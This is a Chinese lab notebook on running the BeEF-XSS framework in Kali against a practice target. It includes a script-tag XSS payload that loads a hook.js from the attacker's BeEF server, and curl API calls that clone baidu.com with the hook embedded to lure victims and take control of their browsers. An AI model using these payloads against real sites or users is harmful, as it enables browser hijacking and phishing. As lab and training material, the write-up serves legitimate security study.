BeEF-XSS实验手记

这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。
BeEF-XSS实验手记_第1张图片
或者直接运行beef-xss命令运行:
BeEF-XSS实验手记_第2张图片
kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器

systemctl start beef-xss.service    #开启beef
systemctl stop beef-xss.service     #关闭beef
systemctl restart beef-xss.service  #重启beef

这个时候可以登陆

<ip>:3000/ui/panel

进入BeEF的web界面了:
BeEF-XSS实验手记_第3张图片
我看到很多网上的教程都说Kali里BeEF的初始账号密码是beef/beef
而我的却显示密码错误,此时可查/usr/share/beef-xss/config.yaml里的账号密码信息:
BeEF-XSS实验手记_第4张图片
我这里的默认账号密码是beef/root
输入账号密码可进入BeEF的主界面。

打开一台XSSeducation靶机,输入XSS代码:

<script src="http://192.168.85.128:3000/hook.js"></script>

BeEF-XSS实验手记_第5张图片
BeEF上检测到被攻击主机(zombix)上线:
BeEF-XSS实验手记_第6张图片
commands下展示的是可以执行的命令模块,BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作, 并用颜色表示:
绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转等)
灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
红色:命令模块不适用于此目标
BeEF-XSS实验手记_第7张图片
BeEF-XSS实验手记_第8张图片
执行结果如下:
BeEF-XSS实验手记_第9张图片
除了在页面中进行XSS注入挂上hook.js以外,还能通过克隆网站,在网站上挂上hook.js,诱骗受害者点击网页从而获取受害主机控制:

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"", "mount":""}' -X POST http://<BeEFURL>/api/seng/clone_page?token=<token>

## 要克隆页面的URL
## 是指克隆的页面你想放在BeEF服务器的那里
## API 的token

为了获取API token,如果原本是通过直接运行点击图标或者直接执行beef-xss命令启动程序的,应该使用service beef-xss stop停止服务,然后进入使用/usr/share/beef-xss/beef 命令重新运行一次beef-XSS,等程序运行完毕,可以在命令行中找到API token且命令行会占用前台持续运行:
BeEF-XSS实验手记_第10张图片
此时可以将所需要克隆的信息填入命令中,比如我的命令如下:

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://www.baidu.com","mount":"/baidu"}' -X POST http://192.168.85.128:3000/api/seng/clone_page?token=003d912d44dff8b15cc9ec231fc19667aa4791bf
{"success":true,"mount":"/baidu"}

执行成功后会返回{“success”:true,“mount”:"/baidu"}
在这里插入图片描述
beef的命令行中会出现:
BeEF-XSS实验手记_第11张图片
登陆克隆界面:http://192.168.85.128:3000/baidu
发现并没有新的zombix上线,搜索网页代码中的hook.js发现src值不对。
BeEF-XSS实验手记_第12张图片
在/usr/share/beef-xss/extensions/social_engineering/web_cloner/cloned_pages/找到文件www.baidu.com_mod
用vi打开定位到hook.js,将src改为https://192.168.85.128:3000/hook.js
在这里插入图片描述
重新进入克隆界面查看源代码,发现不生效。
重启/usr/share/beef-xss/beef发现克隆界面没有了。
可能是配置文件的问题,找到/usr/share/beef-xss/config.yaml
将此处的0.0.0.0修改为可以被访问的ip:192.168.85.129,保存并开启/usr/share/beef-xss/beef
BeEF-XSS实验手记_第13张图片
重新克隆一下页面(记得更新命令里面的API token)
BeEF-XSS实验手记_第14张图片
网页代码中的hook.js路径修改成功。
BeEF中接到zombix上线
BeEF-XSS实验手记_第15张图片

你可能感兴趣的:(BeEF-XSS实验手记)